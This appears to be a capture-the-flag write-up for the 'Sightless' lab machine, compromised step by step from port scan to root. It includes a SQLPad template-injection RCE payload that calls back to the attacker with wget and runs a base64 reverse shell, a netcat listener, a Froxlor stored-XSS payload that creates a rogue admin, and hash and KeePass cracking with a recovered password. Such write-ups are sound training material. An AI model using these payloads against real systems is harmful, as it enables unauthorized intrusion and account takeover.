OS: Linux

Difficulty: Easy

Author: EmSec

Release Date: September 7, 2024

Video Walkthrough

Recon

Nmap

nmap -T4 -A -p- 10.10.11.32 -o initial_scan
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-13 13:38 WEST
Nmap scan report for 10.10.11.32
Host is up (0.041s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp
| fingerprint-strings: 
|   GenericLines: 
|     220 ProFTPD Server (sightless.htb FTP Server) [::ffff:10.10.11.32]
|     Invalid command: try being more creative
|_    Invalid command: try being more creative
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 c9:6e:3b:8f:c6:03:29:05:e5:a0:ca:00:90:c9:5c:52 (ECDSA)
|_  256 9b:de:3a:27:77:3b:1b:e1:19:5f:16:11:be:70:e0:56 (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://sightless.htb/
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port21-TCP:V=7.94SVN%I=7%D=9/13%Time=66E43281%P=x86_64-pc-linux-gnu%r(G
SF:enericLines,A0,"220\x20ProFTPD\x20Server\x20\(sightless\.htb\x20FTP\x20
SF:Server\)\x20\[::ffff:10\.10\.11\.32\]\r\n500\x20Invalid\x20command:\x20
SF:try\x20being\x20more\x20creative\r\n500\x20Invalid\x20command:\x20try\x
SF:20being\x20more\x20creative\r\n");
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=9/13%OT=21%CT=1%CU=31944%PV=Y%DS=2%DC=T%G=Y%TM=66E4
OS:32C4%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=10D%TI=Z%CI=Z%II=I%TS=A)
OS:OPS(O1=M53CST11NW7%O2=M53CST11NW7%O3=M53CNNT11NW7%O4=M53CST11NW7%O5=M53C
OS:ST11NW7%O6=M53CST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)
OS:ECN(R=Y%DF=Y%T=40%W=FAF0%O=M53CNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%
OS:F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T
OS:5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=
OS:Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF
OS:=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40
OS:%CD=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 256/tcp)
HOP RTT      ADDRESS
1   41.34 ms 10.10.14.1
2   41.43 ms 10.10.11.32

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 97.89 seconds

Port	Service
21	FTP
22	SSH
80	HTTP

HTTP Page

Heading to the http page, we can find a SQLPad service.

Add sqlpad.sightless.htb to /etc/hosts and access the service.

FootHold

SQLPAD Template Injection RCE

After some googling, we can find this Template Injection RCE

To test RCE, let’s first create a new connection, and attempt to callback to our machine.
Add a connection, select MySQL as the Driver, and add the following payload in the Database field.

{{ process.mainModule.require('child_process').exec('wget http://<IP>:1234/pwn') }}

Now start a http server on your machine

python3 -m http.server 1234

If we now test the connection, we will get a callback on our machine, confirming RCE.

Reverse Shell

To get our first reverse shell, we just need to change the command to a reverse shell, I had problems using a normal reverse shell, so I had to encode it in base64 first.

Now add a new connection, select MySQL as the Driver again, and add the following payload to the Database field.

{{ process.mainModule.require('child_process').exec('echo "<base64 revshell>" | base64 -d | bash') }}

Also start a listener on your machine.

nc -lvnp 1337

If we test the connection now, we pop a shell.

Michael User

If we notice, we have a shell as a root user, we are in a docker container.
Since we are root, we can take a look at the /etc/shadow file, which has a hash for the michael user.

$6$mG3Cp2VPGY.FDE8u$KVWVIHzqTzhOSYkzJIpFc2EsgmqvPa.q2Z9bLUU6tlBWaEwuxCDEP9UFHIXNUcF2rBnsaFYuJa6DUh/pL2IJD/

Crack the hash

hashcat -m 1800 michael.hash /usr/share/wordlists/rockyou.txt

We now have a user and password

User	Password
michael	insaneclownposse

We can login through ssh with this password.

ssh michael@sightless.htb

PrivEsc

FroxLor CVE-2024-34070

Looking at the used ports in the machine, we can find the port 8080.

netstat -tnlp

Port forward port 8080, in my case I used port 1234 since I use port 8080 for my Burp Suite proxy.

ssh -L 1234:127.0.0.1:8080 michael@sightless.htb

Visiting the port forwarded page, we can see that it is being used for Froxlor.

This instance of froxlor is vulnerable to CVE-2024-34070.
We can follow the steps here to abuse a stored xss vulnerability.
This vulnerability allows an unauthenticated user to inject malicious scripts in the loginname parameter on the Login attempt, which will then be executed when viewed by the Administrator in the System Logs.

Steps to reproduce:

First step is to capture the login request.

We will need to change the loginname parameter to the payload present in the previous github link.

Original Payload:

admin{{$emit.constructor`function+b(){var+metaTag%3ddocument.querySelector('meta[name%3d"csrf-token"]')%3bvar+csrfToken%3dmetaTag.getAttribute('content')%3bvar+xhr%3dnew+XMLHttpRequest()%3bvar+url%3d"https%3a//demo.froxlor.org/admin_admins.php"%3bvar+params%3d"new_loginname%3dabcd%26admin_password%3dAbcd%40%401234%26admin_password_suggestion%3dmgphdKecOu%26def_language%3den%26api_allowed%3d0%26api_allowed%3d1%26name%3dAbcd%26email%3dyldrmtest%40gmail.com%26custom_notes%3d%26custom_notes_show%3d0%26ipaddress%3d-1%26change_serversettings%3d0%26change_serversettings%3d1%26customers%3d0%26customers_ul%3d1%26customers_see_all%3d0%26customers_see_all%3d1%26domains%3d0%26domains_ul%3d1%26caneditphpsettings%3d0%26caneditphpsettings%3d1%26diskspace%3d0%26diskspace_ul%3d1%26traffic%3d0%26traffic_ul%3d1%26subdomains%3d0%26subdomains_ul%3d1%26emails%3d0%26emails_ul%3d1%26email_accounts%3d0%26email_accounts_ul%3d1%26email_forwarders%3d0%26email_forwarders_ul%3d1%26ftps%3d0%26ftps_ul%3d1%26mysqls%3d0%26mysqls_ul%3d1%26csrf_token%3d"%2bcsrfToken%2b"%26page%3dadmins%26action%3dadd%26send%3dsend"%3bxhr.open("POST",url,true)%3bxhr.setRequestHeader("Content-type","application/x-www-form-urlencoded")%3balert("Your+Froxlor+Application+has+been+completely+Hacked")%3bxhr.send(params)}%3ba%3db()`()}}

URL Decode the payload and remove the “https://demo.froxlor.org“ from the url parameter.
I also changed the username and password.

Paste the edited payload in the loginname parameter, and URL encode it.

We can now login with the new created user.

web1 FTP

Looking at the traffic tab, we can find the username called “web1”, associated with FTP traffic.

We can edit the user’s ftp account.
Click on the web1 user, and then FTP > Accounts.

Now just change the user’s FTP password.

We can now access the ftp service.

lftp web1@10.10.11.32

If we try to list the current directory, we get an error from certificate validation, we can disable this with the following command

set ssl:verify-certificate false

KeePass Database

We can find a file called Database.kdb in the /goaccess/backup directory.

This is a KeePass Database file.
We can try accessing it with kpcli.

kpcli --kdb=Database.kdb

It requires a password to access.
We can use keepass2john, to attempt to crack the password with john.

keepass2john Database.kdb > keepass.hash
john keepass.hash -w=/usr/share/wordlists/rockyou.txt --format=KeePass

There is an entry in the Database called ssh in /General/sighless.htb/Backup.

show -f ssh

This entry has a password and a private ssh key as an attachment.
Export the private key.

attach ssh

If we attempt to login as root through ssh with this key, we get an error

chmod 600 id_rsa
ssh root@sightless.htb -i id_rsa

Just use dos2unix and remove the extra space at the end to fix the formatting and use the key again.

dos2unix id_rsa

Rooted :)